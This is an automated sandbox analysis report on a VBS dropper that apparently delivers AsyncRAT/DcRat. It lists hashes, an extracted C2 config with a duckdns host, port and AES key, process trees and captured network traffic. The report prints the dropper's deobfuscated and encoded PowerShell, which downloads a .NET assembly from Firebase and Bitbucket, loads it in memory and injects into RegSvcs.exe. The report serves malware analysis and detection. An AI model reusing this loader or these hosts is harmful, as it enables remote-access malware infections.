Analysis

  • max time kernel
    92s
  • max time network
    138s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    09-08-2024 01:27

General

  • Target

    7b6d6d51a0032be0ac9c3b857065a2ba87caa96dac3d0023d8819eb3baa6dd8c.vbs

  • Size

    23.1MB

  • MD5

    c7b73269543ae666701b2d97172b93fb

  • SHA1

    e6d9435df4b136ceac144b84ec9b8fa7cfead13a

  • SHA256

    7b6d6d51a0032be0ac9c3b857065a2ba87caa96dac3d0023d8819eb3baa6dd8c

  • SHA512

    3cbd06d2e480e3b62f0881a51f7f94f797201de3b6053f1f6b7728c9e3467c24c5f58d5a2304d75487703ce496de9a5d4ee795cab6a08eefa45dc68324590287

  • SSDEEP

    1536:VPadPlP4PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPm:8v

Malware Config

Extracted

Language
ps1
Deobfuscated
$jrdur = "0"
$ouezs = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7b6d6d51a0032be0ac9c3b857065a2ba87caa96dac3d0023d8819eb3baa6dd8c.vbs"
[byte[]]$uefpj = [system.convert]::frombase64string((new-object net.webclient).downloadstring("https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe"))
(((([system.appdomain]::currentdomain).load($uefpj)).gettype("ClassLibrary3.Class1")).getmethod("ZxKHG")).invoke($null, [object[]]"txt.oveunoivne/sdaolnwod/sagracsed/cdsacd/gro.tekcubtib//:sptth", $ouezs, "_____ertgqe__________________-------------", $jrdur, "1", "Roda")
URLs
ps1.dropper

https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

zorra123.duckdns.org:2020

Mutex

DcRatMutex_qwqdanchun

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain
2QYF3nDwKGSugpGDsws0znXIALQRzwTn

Signatures

  • AsyncRat

    AsyncRAT, written in C#, is designed to remotely monitor and control other computers.

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7b6d6d51a0032be0ac9c3b857065a2ba87caa96dac3d0023d8819eb3baa6dd8c.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2636
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bq▒HI▒Z▒B1▒HI▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒G8▒dQBl▒Ho▒cw▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒HU▒ZQBm▒H▒▒ag▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒dQBl▒GY▒c▒Bq▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒JwB0▒Hg▒d▒▒u▒G8▒dgBl▒HU▒bgBv▒Gk▒dgBu▒GU▒LwBz▒GQ▒YQBv▒Gw▒bgB3▒G8▒Z▒▒v▒HM▒YQBn▒HI▒YQBj▒HM▒ZQBk▒C8▒YwBk▒HM▒YQBj▒GQ▒LwBn▒HI▒bw▒u▒HQ▒ZQBr▒GM▒dQBi▒HQ▒aQBi▒C8▒Lw▒6▒HM▒c▒B0▒HQ▒a▒▒n▒C▒▒L▒▒g▒CQ▒bwB1▒GU▒egBz▒C▒▒L▒▒g▒Cc▒XwBf▒F8▒XwBf▒GU▒cgB0▒Gc▒cQBl▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒Jw▒s▒C▒▒J▒Bq▒HI▒Z▒B1▒HI▒L▒▒g▒Cc▒MQ▒n▒Cw▒I▒▒n▒FI▒bwBk▒GE▒Jw▒g▒Ck▒KQ▒7▒▒==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\7b6d6d51a0032be0ac9c3b857065a2ba87caa96dac3d0023d8819eb3baa6dd8c.vbs');powershell -command $KByHL;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4848
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$jrdur = '0';$ouezs = 'C:\Users\Admin\AppData\Local\Temp\7b6d6d51a0032be0ac9c3b857065a2ba87caa96dac3d0023d8819eb3baa6dd8c.vbs';[Byte[]] $uefpj = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($uefpj).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.oveunoivne/sdaolnwod/sagracsed/cdsacd/gro.tekcubtib//:sptth' , $ouezs , '_____ertgqe__________________-------------', $jrdur, '1', 'Roda' ));"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:512
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          4⤵
          PID:2648
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:436

    Network

    • flag-us
      DNS
      firebasestorage.googleapis.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      firebasestorage.googleapis.com
      IN A
      Response
      firebasestorage.googleapis.com
      IN A
      172.217.168.202
      firebasestorage.googleapis.com
      IN A
      142.251.39.106
      firebasestorage.googleapis.com
      IN A
      142.250.179.138
      firebasestorage.googleapis.com
      IN A
      172.217.23.202
      firebasestorage.googleapis.com
      IN A
      142.250.179.170
      firebasestorage.googleapis.com
      IN A
      142.251.36.42
      firebasestorage.googleapis.com
      IN A
      142.251.36.10
      firebasestorage.googleapis.com
      IN A
      142.250.179.202
      firebasestorage.googleapis.com
      IN A
      216.58.214.10
    • flag-nl
      GET
      https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe
      powershell.exe
      Remote address:
      172.217.168.202:443
      Request
      GET /v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe HTTP/1.1
      Host: firebasestorage.googleapis.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Expires: Fri, 09 Aug 2024 01:27:26 GMT
      Date: Fri, 09 Aug 2024 01:27:26 GMT
      Cache-Control: private, max-age=0
      Last-Modified: Wed, 03 Jul 2024 14:08:24 GMT
      ETag: "5acaccbd879c3f61007eb990ca8b218a"
      x-goog-generation: 1720015704370424
      x-goog-metageneration: 1
      x-goog-stored-content-encoding: identity
      x-goog-stored-content-length: 12972
      x-goog-meta-firebaseStorageDownloadTokens: 61c829f6-e196-49e8-b4ff-041134577ffe
      Content-Type: text/plain
      Content-Disposition: inline; filename*=utf-8''dll%20Hope.txt
      x-goog-hash: crc32c=W9dNRw==
      x-goog-hash: md5=WsrMvYecP2EAfrmQyoshig==
      x-goog-storage-class: STANDARD
      Accept-Ranges: bytes
      Content-Length: 12972
      X-GUploader-UploadID: AHxI1nN9UiHrYcWyxVZXLqRlGAzPzQ8PbVMuRPf-GDQib2FUgol5EKoNmEiFt9twRNHZUFQj7bE
      Server: UploadServer
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    • flag-nl
      GET
      https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/Pe%2FPe%20Hope.txt?alt=media&token=7fe13398-6aa2-43e8-992c-35095e035362
      powershell.exe
      Remote address:
      172.217.168.202:443
      Request
      GET /v0/b/rodriakd-8413d.appspot.com/o/Pe%2FPe%20Hope.txt?alt=media&token=7fe13398-6aa2-43e8-992c-35095e035362 HTTP/1.1
      Host: firebasestorage.googleapis.com
      Response
      HTTP/1.1 200 OK
      Expires: Fri, 09 Aug 2024 01:27:26 GMT
      Date: Fri, 09 Aug 2024 01:27:26 GMT
      Cache-Control: private, max-age=0
      Last-Modified: Wed, 03 Jul 2024 14:01:52 GMT
      ETag: "943e47fb5db1e3ea3fd3dc15ea548bb9"
      x-goog-generation: 1720015312004933
      x-goog-metageneration: 1
      x-goog-stored-content-encoding: identity
      x-goog-stored-content-length: 26536
      x-goog-meta-firebaseStorageDownloadTokens: 7fe13398-6aa2-43e8-992c-35095e035362
      Content-Type: text/plain
      Content-Disposition: inline; filename*=utf-8''Pe%20Hope.txt
      x-goog-hash: crc32c=HduiyA==
      x-goog-hash: md5=lD5H+12x4+o/09wV6lSLuQ==
      x-goog-storage-class: STANDARD
      Accept-Ranges: bytes
      Content-Length: 26536
      X-GUploader-UploadID: AHxI1nNIwbBc25dxE9W2DJTPUsT34HoaPuu8T_VOYqlP1VaVDq9PNZ4LXXlMzysVR92j-pHB0-XJ_nk4Iw
      Server: UploadServer
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    • flag-us
      DNS
      g.bing.com
      Remote address:
      8.8.8.8:53
      Request
      g.bing.com
      IN A
      Response
      g.bing.com
      IN CNAME
      g-bing-com.dual-a-0034.a-msedge.net
      g-bing-com.dual-a-0034.a-msedge.net
      IN CNAME
      dual-a-0034.a-msedge.net
      dual-a-0034.a-msedge.net
      IN A
      204.79.197.237
      dual-a-0034.a-msedge.net
      IN A
      13.107.21.237
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid=
      Remote address:
      204.79.197.237:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MUID=3BA29E871DE267F8084F8A511C0266B4; domain=.bing.com; expires=Wed, 03-Sep-2025 01:27:26 GMT; path=/; SameSite=None; Secure; Priority=High;
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 9004DF6BC08E439AA95AD5EE3AA57132 Ref B: LON04EDGE1006 Ref C: 2024-08-09T01:27:26Z
      date: Fri, 09 Aug 2024 01:27:25 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid=
      Remote address:
      204.79.197.237:443
      Request
      GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=3BA29E871DE267F8084F8A511C0266B4
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MSPTC=sS6RtUKbaiXiKMJ0OBmt2h1uTxQNhgdOLM-MSZxmVIQ; domain=.bing.com; expires=Wed, 03-Sep-2025 01:27:26 GMT; path=/; Partitioned; secure; SameSite=None
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 6B30D7C49CDF4B51B75B716C2ADFD483 Ref B: LON04EDGE1006 Ref C: 2024-08-09T01:27:26Z
      date: Fri, 09 Aug 2024 01:27:25 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid=
      Remote address:
      204.79.197.237:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=3BA29E871DE267F8084F8A511C0266B4; MSPTC=sS6RtUKbaiXiKMJ0OBmt2h1uTxQNhgdOLM-MSZxmVIQ
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: B57495C9FED146DE8C65967521672062 Ref B: LON04EDGE1006 Ref C: 2024-08-09T01:27:26Z
      date: Fri, 09 Aug 2024 01:27:25 GMT
    • flag-us
      DNS
      202.168.217.172.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      202.168.217.172.in-addr.arpa
      IN PTR
      Response
      202.168.217.172.in-addr.arpa
      IN PTR
      ams16s32-in-f10.1e100.net
    • flag-us
      DNS
      20.160.190.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      20.160.190.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      237.197.79.204.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      237.197.79.204.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      172.210.232.199.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      172.210.232.199.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      bitbucket.org
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      bitbucket.org
      IN A
      Response
      bitbucket.org
      IN A
      185.166.141.9
      bitbucket.org
      IN A
      185.166.141.8
      bitbucket.org
      IN A
      185.166.141.7
    • flag-gb
      GET
      https://bitbucket.org/dcasdc/descargas/downloads/envionuevo.txt
      powershell.exe
      Remote address:
      185.166.141.9:443
      Request
      GET /dcasdc/descargas/downloads/envionuevo.txt HTTP/1.1
      Host: bitbucket.org
      Connection: Keep-Alive
      Response
      HTTP/1.1 302 Found
      Date: Fri, 09 Aug 2024 01:27:26 GMT
      Content-Type: text/html; charset=utf-8
      Content-Length: 0
      Server: AtlassianEdge
      Location: https://bbuseruploads.s3.amazonaws.com/d7391395-d01d-48b5-961f-472a0db3cdcd/downloads/c05fe59e-dc13-430a-b46b-5e855495a3a5/envionuevo.txt?response-content-disposition=attachment%3B%20filename%3D%22envionuevo.txt%22&AWSAccessKeyId=ASIA6KOSE3BNPUKA5MUH&Signature=%2BncxH5Vxtc4KFBecOd7U0pJpNcQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEIaCXVzLWVhc3QtMSJGMEQCIArbPCNbg1UjGtvP1oG0oH0Hmyyg7%2F4%2B54J9m7ZYFRtFAiAxX49Jj4sMU6TZuYf4Blc7HCHdekIw%2F9EDtWwEnBDvmCqnAgg7EAAaDDk4NDUyNTEwMTE0NiIMjin8V1G6IR8tUuLuKoQCUq1bMun%2Fae4YCA5zLV3Clw2qh%2BqNJR42rQTX%2FZGsByNVd1rh2pfktU89eJrerxX6jcrUdBTNrhChe%2FHnQBxTgsi4keoIozkMPAgzVgs8h%2FBuVsoceeI27FQBSvBlJvInJ8hRtLPIt9Qy%2BuPebg8uEzn7LbwXiUZrTlxsXlzm5xhtZFjgH1wIFxPw5NaFAx6c5YUll0g5hPDqqfTq7uu5C6G1Vt2PxE3%2BJ4xfhAljT1hCFXC46NGXeI2IvAUnwLuqQVvoWOG3TXbxZPbj3gUMNzj%2B%2BYywydApGL3pNvueIxu72b2l8BB7gnaOrIn%2BVk3O4D%2FXWEC4jRE4wP6%2FYu%2BMmlQ8LGkws97VtQY6ngEm5pXneUlNlqE7Q91G33zEgBHlai2YxiDRNVb5NuSpPWinmdubpeOn%2F7nNDvycu6wbY0fAbqarTP4Cnoe8%2FLIJzOpX7DbIn1j7k7M%2BHSPJ1vfxT9guIMKW6NTH8QvFjJq07s3xsW%2B2zIVHmDPEx8Zpm4O5xRPACWwQkO%2BSZAwai0zPFni0u3vjW8%2FAVKAvKkEB6DUKWrizTwUlCdZZxg%3D%3D&Expires=1723168315
      Expires: Fri, 09 Aug 2024 01:27:26 GMT
      Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
      X-Used-Mesh: False
      Vary: Accept-Language, Origin
      Content-Language: en
      X-View-Name: bitbucket.apps.downloads.views.download_file
      X-Dc-Location: Micros-3
      X-Served-By: 94aa115e3b4c
      X-Version: d5ee04fb2c50
      X-Static-Version: d5ee04fb2c50
      X-Request-Count: 235
      X-Render-Time: 0.045334577560424805
      X-B3-Traceid: b55ab0c43fb54e239bc27e1a04048e4e
      X-B3-Spanid: c70d8cfe88c24ed9
      X-Frame-Options: SAMEORIGIN
      Content-Security-Policy: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; object-src 'none'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; base-uri 'self'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
      X-Usage-Quota-Remaining: 999183.155
      X-Usage-Request-Cost: 830.20
      X-Usage-User-Time: 0.020761
      X-Usage-System-Time: 0.004145
      X-Usage-Input-Ops: 0
      X-Usage-Output-Ops: 0
      Age: 0
      X-Cache: MISS
      X-Content-Type-Options: nosniff
      X-Xss-Protection: 1; mode=block
      Atl-Traceid: b55ab0c43fb54e239bc27e1a04048e4e
      Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
      Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
    • flag-us
      DNS
      bbuseruploads.s3.amazonaws.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      bbuseruploads.s3.amazonaws.com
      IN A
      Response
      bbuseruploads.s3.amazonaws.com
      IN CNAME
      s3-1-w.amazonaws.com
      s3-1-w.amazonaws.com
      IN CNAME
      s3-w.us-east-1.amazonaws.com
      s3-w.us-east-1.amazonaws.com
      IN A
      52.217.165.225
      s3-w.us-east-1.amazonaws.com
      IN A
      52.216.29.148
      s3-w.us-east-1.amazonaws.com
      IN A
      3.5.30.67
      s3-w.us-east-1.amazonaws.com
      IN A
      52.216.52.161
      s3-w.us-east-1.amazonaws.com
      IN A
      3.5.28.116
      s3-w.us-east-1.amazonaws.com
      IN A
      3.5.28.213
      s3-w.us-east-1.amazonaws.com
      IN A
      3.5.29.163
      s3-w.us-east-1.amazonaws.com
      IN A
      3.5.2.158
    • flag-us
      GET
      https://bbuseruploads.s3.amazonaws.com/d7391395-d01d-48b5-961f-472a0db3cdcd/downloads/c05fe59e-dc13-430a-b46b-5e855495a3a5/envionuevo.txt?response-content-disposition=attachment%3B%20filename%3D%22envionuevo.txt%22&AWSAccessKeyId=ASIA6KOSE3BNPUKA5MUH&Signature=%2BncxH5Vxtc4KFBecOd7U0pJpNcQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEIaCXVzLWVhc3QtMSJGMEQCIArbPCNbg1UjGtvP1oG0oH0Hmyyg7%2F4%2B54J9m7ZYFRtFAiAxX49Jj4sMU6TZuYf4Blc7HCHdekIw%2F9EDtWwEnBDvmCqnAgg7EAAaDDk4NDUyNTEwMTE0NiIMjin8V1G6IR8tUuLuKoQCUq1bMun%2Fae4YCA5zLV3Clw2qh%2BqNJR42rQTX%2FZGsByNVd1rh2pfktU89eJrerxX6jcrUdBTNrhChe%2FHnQBxTgsi4keoIozkMPAgzVgs8h%2FBuVsoceeI27FQBSvBlJvInJ8hRtLPIt9Qy%2BuPebg8uEzn7LbwXiUZrTlxsXlzm5xhtZFjgH1wIFxPw5NaFAx6c5YUll0g5hPDqqfTq7uu5C6G1Vt2PxE3%2BJ4xfhAljT1hCFXC46NGXeI2IvAUnwLuqQVvoWOG3TXbxZPbj3gUMNzj%2B%2BYywydApGL3pNvueIxu72b2l8BB7gnaOrIn%2BVk3O4D%2FXWEC4jRE4wP6%2FYu%2BMmlQ8LGkws97VtQY6ngEm5pXneUlNlqE7Q91G33zEgBHlai2YxiDRNVb5NuSpPWinmdubpeOn%2F7nNDvycu6wbY0fAbqarTP4Cnoe8%2FLIJzOpX7DbIn1j7k7M%2BHSPJ1vfxT9guIMKW6NTH8QvFjJq07s3xsW%2B2zIVHmDPEx8Zpm4O5xRPACWwQkO%2BSZAwai0zPFni0u3vjW8%2FAVKAvKkEB6DUKWrizTwUlCdZZxg%3D%3D&Expires=1723168315
      powershell.exe
      Remote address:
      52.217.165.225:443
      Request
